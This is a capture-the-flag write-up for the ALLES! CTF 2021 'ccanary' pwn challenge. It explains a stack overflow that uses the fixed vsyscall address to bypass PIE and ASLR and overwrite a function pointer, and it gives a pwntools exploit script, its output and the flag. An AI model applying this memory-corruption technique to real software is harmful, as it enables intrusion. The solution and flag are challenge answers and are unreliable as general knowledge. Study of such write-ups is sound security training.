CTFtime.org

ccanary

by mito / m1t0

Rating: 1.0

## ccanary

> Points: 133
>
> Solves: 89

### Description:
I'm using arch btw... ¯\_(ツ)_/¯

### Attachments:
```
ccanary https://static.allesctf.net/1034e3b4626ce02001a330342be622edba032d07a8cbf6f0d3aecd4036370f40/ccanary
ccanary.c https://static.allesctf.net/ffa321004f1a6f232e38e8d314920e290ee50cfce02d1632e4dfee8d0abf1c1d/ccanary.c
```

## Analysis:

The C language source code is provided below.
https://github.com/mito753/CTF/blob/main/2021/ALLES!_CTF_2021/Pwn_ccanary/ccanary.c

- We can enter character strings from 0x7fffffffdd99 in the stack state below.
- The flag can be displayed if the value (0x0000555555555210) of data.call_canary((a) part) is not destroyed and a non-zero value can be written to data.give_flag((b) part).
- However, since PIE and ASLA are valid, the address of the data.call_canary () function cannot be guessed.
```
0x7fffffffdd90: 0x00000000000000c2 0x79202d0a22414122

0x7fffffffdda0: 0x31323032202c756f 0x0000000000000000
0x7fffffffddb0: 0x0000000000000000 0x0000555555555210
(a)data.call_canary()
0x7fffffffddc0: 0x0000000000000000 0xc18083ccda1b7d00
(b)data.give_flag
0x7fffffffddd0: 0x00005555555553b0 0x00007ffff7a03bf7
```

## Solution:

By writing the following sys_time (0xc9) address (0xffffffffff600400) that is not affected by PIE and ASLA to data.call_canary (a part), 1 can be written to data.give_flag without causing a Segmentation fault.

```
gdb-peda$ x/10i 0xffffffffff600400
0xffffffffff600400: mov rax,0xc9
0xffffffffff600407: syscall
0xffffffffff600409: ret
0xffffffffff60040a: int3
```

## Exploit code:
```python
from pwn import *

#context(os='linux', arch='amd64')
#context.log_level = 'debug'

BINARY = './ccanary'
elf = ELF(BINARY)

if len(sys.argv) > 1 and sys.argv[1] == 'r':
s = process("ncat --ssl 7b0000007c7be7ad4dab5be5-ccanary.challenge.master.allesctf.net 31337", shell=True)
else:
s = process(BINARY)

s.recvuntil("quote> ")

buf = "A"*(0x1f)
buf += p64(0xffffffffff600400) # sys_time
buf += p64(1)
s.sendline(buf)

s.interactive()
```

## Results:
```bash
mito@ubuntu:~/CTF/ALLES!_CTF_2021/Pwn_ccanary$ python solve.py r
[*] '/home/mito/CTF/ALLES!_CTF_2021/Pwn_ccanary/ccanary'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[+] Starting local process '/bin/sh': pid 60051
[*] Switching to interactive mode
good birb!
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Here's the flag:
ALLES!{th1s_m1ght_n0t_work_on_y0ur_syst3m_:^)}
```

Original writeup (https://github.com/mito753/CTF/tree/main/2021/ALLES!_CTF_2021/Pwn_ccanary).

Comments